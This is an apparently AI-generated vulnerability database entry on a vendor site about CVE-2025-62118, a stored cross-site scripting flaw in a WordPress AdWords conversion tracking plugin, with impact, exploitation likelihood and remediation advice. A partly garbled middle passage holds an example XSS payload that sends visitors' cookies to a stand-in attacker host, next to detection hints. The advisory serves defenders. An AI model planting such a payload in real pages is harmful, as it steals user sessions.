
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-62118 is a Stored Cross-Site Scripting (XSS) vulnerability in the AdWords Conversion Tracking Code WordPress plugin by kcseopro. It affects all versions up to and including 1.0, with no patched version currently available. The vulnerability was published on December 31, 2025, and was discovered and reported by Patchstack. It carries a CVSS v3.1 base score of 6.5 (Medium) (Red Hat CVE, Patchstack DB).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically of the Stored XSS variant. The plugin fails to properly sanitize and escape user-supplied input before storing and rendering it in web pages, allowing a low-privileged authenticated attacker to inject malicious scripts. The attack vector is network-based, requires low privileges and user interaction (a victim must view the affected page), and has a changed scope — meaning the injected script can affect resources beyond the vulnerable component itself (Red Hat CVE, Patchstack DB).
Successful exploitation allows an authenticated attacker with low privileges to store malicious JavaScript that executes in the browsers of other users (including administrators) who visit the affected WordPress pages. This can result in session cookie theft, credential harvesting, unauthorized actions performed on behalf of victims, and potential site defacement or further compromise of the WordPress installation (Red Hat CVE).
No public proof-of-concept exploit code or in-the-wild exploitation has been reported for CVE-2025-62118. The EPSS score is approximately 0.034%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an authenticated account with at least low-level privileges on the target WordPress site (Red Hat CVE, Patchstack DB).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.wp_options table) containing <script>, javascript:, or encoded XSS strings associated with the adwords-conversion-tracking-code plugin.As of the disclosure date (December 31, 2025), no patched version of the AdWords Conversion Tracking Code plugin has been released. The recommended immediate action is to deactivate and remove the plugin from all WordPress installations until a fix is available. Site administrators should also restrict plugin settings access to trusted users only and monitor for suspicious input in plugin configuration fields. Wordfence's weekly vulnerability report covering this period also flagged this plugin for removal (Wordfence Blog, Patchstack DB).
Wordfence included CVE-2025-62118 in its weekly WordPress vulnerability report covering December 15, 2025 to January 4, 2026, highlighting it as part of a broader set of plugin vulnerabilities disclosed during that period (Wordfence Blog). No significant independent researcher commentary or broader media coverage has been identified for this specific CVE.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."